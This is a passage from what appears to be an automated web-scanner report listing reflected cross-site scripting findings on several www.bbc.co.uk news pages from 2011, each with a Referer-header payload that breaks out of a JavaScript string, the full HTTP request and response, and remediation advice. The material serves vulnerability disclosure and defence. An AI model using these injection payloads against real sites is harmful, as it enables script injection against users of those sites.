The value of the Referer HTTP header is copied into a JavaScript string literal delimited by single quotation marks: the referrer property of the bbc.fmtj.page object in an inline script. The payload 65f2f'-alert(1)-'256936644b7 was submitted in the Referer HTTP header and was echoed into that literal with its quotation marks intact. The response also shows that the value is HTML-entity-encoded on output (the & in the Referer appears as &amp;), but HTML encoding does not neutralize a single quote inside a JavaScript string, so the first quote of the payload terminates the literal and -alert(1)- is evaluated as an expression when the script runs.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data is submitted in a request header, the flaw cannot be triggered simply by giving a victim a crafted www.bbc.co.uk URL. The Referer is populated by the browser from the URL of the page that linked to the target, so an attacker who lures a victim into following a link from a page hosted at a URL containing the payload can influence it, subject to how the browser encodes that URL (browsers that follow the WHATWG URL Standard percent-encode the single quote in the query component of http and https URLs, which would defeat this particular payload). In the past, client-side technologies such as Flash could also be used to make another user's browser send a request carrying an arbitrary HTTP header. These limitations partially mitigate the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Where it must, the value should be serialized with an encoder for the JavaScript string context (for example JSON encoding, with <, >, & and the line terminators U+2028 and U+2029 additionally written as \uXXXX escapes so the output can never contain </script> or break out of the literal) in place of the HTML-entity encoding applied here, which is the wrong encoder for a <script> block and also leaves &amp; in the stored value.

Request

GET /news/health-12415801 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=65f2f'-alert(1)-'256936644b7

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:11 GMT
Keep-Alive: timeout=10, max=784
Expires: Sat, 12 Feb 2011 02:03:11 GMT
Connection: close
Set-Cookie: BBC-UID=544df5053e5ae56f0be8ab6ea109ce1310acad12e09031198b4b13bf3b6402ae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:11 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=544df5053e5ae56f0be8ab6ea109ce1310acad12e09031198b4b13bf3b6402ae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:11 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476191000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=65f2f'-alert(1)-'256936644b7',
       section: 'health',
       sectionPath: '/Health',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12415801',
       assetType: 'story',
       uri: '/news/health-124158
...[SNIP]...

1.71. http://www.bbc.co.uk/news/magazine-12392811 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12392811

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by single quotation marks: the referrer property of the bbc.fmtj.page object in an inline script. The payload e128e'-alert(1)-'c9f6d44bf44 was submitted in the Referer HTTP header and was echoed into that literal with its quotation marks intact. The response also shows that the value is HTML-entity-encoded on output (the & in the Referer appears as &amp;), but HTML encoding does not neutralize a single quote inside a JavaScript string, so the first quote of the payload terminates the literal and -alert(1)- is evaluated as an expression when the script runs.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data is submitted in a request header, the flaw cannot be triggered simply by giving a victim a crafted www.bbc.co.uk URL. The Referer is populated by the browser from the URL of the page that linked to the target, so an attacker who lures a victim into following a link from a page hosted at a URL containing the payload can influence it, subject to how the browser encodes that URL (browsers that follow the WHATWG URL Standard percent-encode the single quote in the query component of http and https URLs, which would defeat this particular payload). In the past, client-side technologies such as Flash could also be used to make another user's browser send a request carrying an arbitrary HTTP header. These limitations partially mitigate the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Where it must, the value should be serialized with an encoder for the JavaScript string context (for example JSON encoding, with <, >, & and the line terminators U+2028 and U+2029 additionally written as \uXXXX escapes so the output can never contain </script> or break out of the literal) in place of the HTML-entity encoding applied here, which is the wrong encoder for a <script> block and also leaves &amp; in the stored value.

Request

GET /news/magazine-12392811 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e128e'-alert(1)-'c9f6d44bf44

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:16 GMT
Keep-Alive: timeout=10, max=799
Expires: Sat, 12 Feb 2011 02:03:16 GMT
Connection: close
Set-Cookie: BBC-UID=74dd1585feeab6c44ae339819147a50973ebdad590e0611a541b4a3627f427480Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=74dd1585feeab6c44ae339819147a50973ebdad590e0611a541b4a3627f427480Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Content-Length: 83414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476196000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=e128e'-alert(1)-'c9f6d44bf44',
       section: 'magazine',
       sectionPath: '/Magazine',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12392811',
       assetType: 'story',
       uri: '/news/magazine-
...[SNIP]...

1.72. http://www.bbc.co.uk/news/magazine-12418046 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12418046

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by single quotation marks: the referrer property of the bbc.fmtj.page object in an inline script. The payload 50bae'-alert(1)-'d15676da76 was submitted in the Referer HTTP header and was echoed into that literal with its quotation marks intact. The response also shows that the value is HTML-entity-encoded on output (the & in the Referer appears as &amp;), but HTML encoding does not neutralize a single quote inside a JavaScript string, so the first quote of the payload terminates the literal and -alert(1)- is evaluated as an expression when the script runs.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data is submitted in a request header, the flaw cannot be triggered simply by giving a victim a crafted www.bbc.co.uk URL. The Referer is populated by the browser from the URL of the page that linked to the target, so an attacker who lures a victim into following a link from a page hosted at a URL containing the payload can influence it, subject to how the browser encodes that URL (browsers that follow the WHATWG URL Standard percent-encode the single quote in the query component of http and https URLs, which would defeat this particular payload). In the past, client-side technologies such as Flash could also be used to make another user's browser send a request carrying an arbitrary HTTP header. These limitations partially mitigate the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Where it must, the value should be serialized with an encoder for the JavaScript string context (for example JSON encoding, with <, >, & and the line terminators U+2028 and U+2029 additionally written as \uXXXX escapes so the output can never contain </script> or break out of the literal) in place of the HTML-entity encoding applied here, which is the wrong encoder for a <script> block and also leaves &amp; in the stored value.

Request

GET /news/magazine-12418046 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=50bae'-alert(1)-'d15676da76

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:25 GMT
Keep-Alive: timeout=10, max=665
Expires: Sat, 12 Feb 2011 02:03:25 GMT
Connection: close
Set-Cookie: BBC-UID=c4fdb505beca064d39d8f8d27134f7d5e04e6f249040c1697b7bf31411b4eafe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=c4fdb505beca064d39d8f8d27134f7d5e04e6f249040c1697b7bf31411b4eafe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Content-Length: 80664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476205000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=50bae'-alert(1)-'d15676da76',
       section: 'magazine',
       sectionPath: '/Magazine',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12418046',
       assetType: 'story',
       uri: '/news/magazine-
...[SNIP]...

1.73. http://www.bbc.co.uk/news/magazine-12428754 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12428754

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by single quotation marks: the referrer property of the bbc.fmtj.page object in an inline script. The payload 5cbf7'-alert(1)-'1db4f3eedab was submitted in the Referer HTTP header and was echoed into that literal with its quotation marks intact. The response also shows that the value is HTML-entity-encoded on output (the & in the Referer appears as &amp;), but HTML encoding does not neutralize a single quote inside a JavaScript string, so the first quote of the payload terminates the literal and -alert(1)- is evaluated as an expression when the script runs.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data is submitted in a request header, the flaw cannot be triggered simply by giving a victim a crafted www.bbc.co.uk URL. The Referer is populated by the browser from the URL of the page that linked to the target, so an attacker who lures a victim into following a link from a page hosted at a URL containing the payload can influence it, subject to how the browser encodes that URL (browsers that follow the WHATWG URL Standard percent-encode the single quote in the query component of http and https URLs, which would defeat this particular payload). In the past, client-side technologies such as Flash could also be used to make another user's browser send a request carrying an arbitrary HTTP header. These limitations partially mitigate the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Where it must, the value should be serialized with an encoder for the JavaScript string context (for example JSON encoding, with <, >, & and the line terminators U+2028 and U+2029 additionally written as \uXXXX escapes so the output can never contain </script> or break out of the literal) in place of the HTML-entity encoding applied here, which is the wrong encoder for a <script> block and also leaves &amp; in the stored value.

Request

GET /news/magazine-12428754 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5cbf7'-alert(1)-'1db4f3eedab

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:13 GMT
Keep-Alive: timeout=10, max=698
Expires: Sat, 12 Feb 2011 02:03:13 GMT
Connection: close
Set-Cookie: BBC-UID=b4fd1525de4a86d1abebe59e91677fc0986d3a0900c031994b4b822d34bfc1fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:13 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4fd1525de4a86d1abebe59e91677fc0986d3a0900c031994b4b822d34bfc1fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:13 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476193000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=5cbf7'-alert(1)-'1db4f3eedab',
       section: 'magazine',
       sectionPath: '/Magazine',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428754',
       assetType: 'story',
       uri: '/news/magazine-
...[SNIP]...

1.74. http://www.bbc.co.uk/news/magazine-12428759 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12428759

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by single quotation marks: the referrer property of the bbc.fmtj.page object in an inline script. The payload 7b22b'-alert(1)-'4a9a1953a1b was submitted in the Referer HTTP header and was echoed into that literal with its quotation marks intact. The response also shows that the value is HTML-entity-encoded on output (the & in the Referer appears as &amp;), but HTML encoding does not neutralize a single quote inside a JavaScript string, so the first quote of the payload terminates the literal and -alert(1)- is evaluated as an expression when the script runs.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data is submitted in a request header, the flaw cannot be triggered simply by giving a victim a crafted www.bbc.co.uk URL. The Referer is populated by the browser from the URL of the page that linked to the target, so an attacker who lures a victim into following a link from a page hosted at a URL containing the payload can influence it, subject to how the browser encodes that URL (browsers that follow the WHATWG URL Standard percent-encode the single quote in the query component of http and https URLs, which would defeat this particular payload). In the past, client-side technologies such as Flash could also be used to make another user's browser send a request carrying an arbitrary HTTP header. These limitations partially mitigate the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Where it must, the value should be serialized with an encoder for the JavaScript string context (for example JSON encoding, with <, >, & and the line terminators U+2028 and U+2029 additionally written as \uXXXX escapes so the output can never contain </script> or break out of the literal) in place of the HTML-entity encoding applied here, which is the wrong encoder for a <script> block and also leaves &amp; in the stored value.

Request

GET /news/magazine-12428759 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7b22b'-alert(1)-'4a9a1953a1b

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:20 GMT
Keep-Alive: timeout=10, max=782
Expires: Sat, 12 Feb 2011 02:03:20 GMT
Connection: close
Set-Cookie: BBC-UID=e4fda5452e1ae6980b8b68bc8193e4e228c0316270e081492b6be2adf46f013e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e4fda5452e1ae6980b8b68bc8193e4e228c0316270e081492b6be2adf46f013e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 101336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476200000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=7b22b'-alert(1)-'4a9a1953a1b',
       section: 'magazine',
       sectionPath: '/Magazine',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428759',
       assetType: 'story',
       uri: '/news/magazine-
...[SNIP]...

1.75. http://www.bbc.co.uk/news/science-environment-12412662 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12412662

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by single quotation marks: the referrer property of the bbc.fmtj.page object in an inline script. The payload d7ccf'-alert(1)-'71f05dbe4a5 was submitted in the Referer HTTP header and was echoed into that literal with its quotation marks intact. The response also shows that the value is HTML-entity-encoded on output (the & in the Referer appears as &amp;), but HTML encoding does not neutralize a single quote inside a JavaScript string, so the first quote of the payload terminates the literal and -alert(1)- is evaluated as an expression when the script runs.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data is submitted in a request header, the flaw cannot be triggered simply by giving a victim a crafted www.bbc.co.uk URL. The Referer is populated by the browser from the URL of the page that linked to the target, so an attacker who lures a victim into following a link from a page hosted at a URL containing the payload can influence it, subject to how the browser encodes that URL (browsers that follow the WHATWG URL Standard percent-encode the single quote in the query component of http and https URLs, which would defeat this particular payload). In the past, client-side technologies such as Flash could also be used to make another user's browser send a request carrying an arbitrary HTTP header. These limitations partially mitigate the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Where it must, the value should be serialized with an encoder for the JavaScript string context (for example JSON encoding, with <, >, & and the line terminators U+2028 and U+2029 additionally written as \uXXXX escapes so the output can never contain </script> or break out of the literal) in place of the HTML-entity encoding applied here, which is the wrong encoder for a <script> block and also leaves &amp; in the stored value.

Request

GET /news/science-environment-12412662 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d7ccf'-alert(1)-'71f05dbe4a5

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:16 GMT
Keep-Alive: timeout=10, max=783
Expires: Sat, 12 Feb 2011 02:03:16 GMT
Connection: close
Set-Cookie: BBC-UID=d43dd545ce8a06a47a538b7b01afefd5d556283d3080b1e97bcb439f4195376a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=d43dd545ce8a06a47a538b7b01afefd5d556283d3080b1e97bcb439f4195376a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476196000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=d7ccf'-alert(1)-'71f05dbe4a5',
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12412662',
       assetType: 'st
...[SNIP]...

1.76. http://www.bbc.co.uk/news/science-environment-12417858 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12417858

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by single quotation marks: the referrer property of the bbc.fmtj.page object in an inline script. The payload b7b1c'-alert(1)-'62e041ac4f8 was submitted in the Referer HTTP header and was echoed into that literal with its quotation marks intact. The response also shows that the value is HTML-entity-encoded on output (the & in the Referer appears as &amp;), but HTML encoding does not neutralize a single quote inside a JavaScript string, so the first quote of the payload terminates the literal and -alert(1)- is evaluated as an expression when the script runs.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data is submitted in a request header, the flaw cannot be triggered simply by giving a victim a crafted www.bbc.co.uk URL. The Referer is populated by the browser from the URL of the page that linked to the target, so an attacker who lures a victim into following a link from a page hosted at a URL containing the payload can influence it, subject to how the browser encodes that URL (browsers that follow the WHATWG URL Standard percent-encode the single quote in the query component of http and https URLs, which would defeat this particular payload). In the past, client-side technologies such as Flash could also be used to make another user's browser send a request carrying an arbitrary HTTP header. These limitations partially mitigate the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS difficult to prevent; if at all possible, the application should not echo user data in this context. Where it must, the value should be serialized with an encoder for the JavaScript string context (for example JSON encoding, with <, >, & and the line terminators U+2028 and U+2029 additionally written as \uXXXX escapes so the output can never contain </script> or break out of the literal) in place of the HTML-entity encoding applied here, which is the wrong encoder for a <script> block and also leaves &amp; in the stored value.

Request

GET /news/science-environment-12417858 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=b7b1c'-alert(1)-'62e041ac4f8

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:15 GMT
Keep-Alive: timeout=10, max=780
Expires: Sat, 12 Feb 2011 02:03:15 GMT
Connection: close
Set-Cookie: BBC-UID=b41df5253e8a86f31a612a1a5188c689ee1879aaa04021a95bcb03c2d71d39ce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b41df5253e8a86f31a612a1a5188c689ee1879aaa04021a95bcb03c2d71d39ce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476195000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=b7b1c'-alert(1)-'62e041ac4f8',
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12417858',
       assetType: 'st
...[SNIP]...

1.77. http://www.bbc.co.uk/news/science-environment-12424620 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12424620

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a9de'-alert(1)-'05847a715b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/science-environment-12424620 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1a9de'-alert(1)-'05847a715b

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:18 GMT
Keep-Alive: timeout=10, max=785
Expires: Sat, 12 Feb 2011 02:03:18 GMT
Connection: close
Set-Cookie: BBC-UID=144d75e59ecaa6460b3922e3912a2b214aa5a163e000524317cd83d40c0893500Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:18 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=144d75e59ecaa6460b3922e3912a2b214aa5a163e000524317cd83d40c0893500Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:18 GMT; path=/; domain=bbc.co.uk;
Content-Length: 46598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476198000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=1a9de'-alert(1)-'05847a715b',
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12424620',
       assetType: 'ph
...[SNIP]...

1.78. http://www.bbc.co.uk/news/technology-12419672 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/technology-12419672

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3c0c'-alert(1)-'cbbb8f8eed2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/technology-12419672 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f3c0c'-alert(1)-'cbbb8f8eed2

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:17 GMT
Keep-Alive: timeout=10, max=776
Expires: Sat, 12 Feb 2011 02:03:17 GMT
Connection: close
Set-Cookie: BBC-UID=54bd55551eca96c5fac8fce4119595cd3f5f4210d020a1aa748bda75429125040Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=54bd55551eca96c5fac8fce4119595cd3f5f4210d020a1aa748bda75429125040Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476197000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=f3c0c'-alert(1)-'cbbb8f8eed2',
       section: 'technology',
       sectionPath: '/Technology',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12419672',
       assetType: 'story',
       uri: '/news/techn
...[SNIP]...

1.79. http://www.bbc.co.uk/news/technology-12429808 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/technology-12429808

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e41b9'-alert(1)-'07f6b7abb93 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

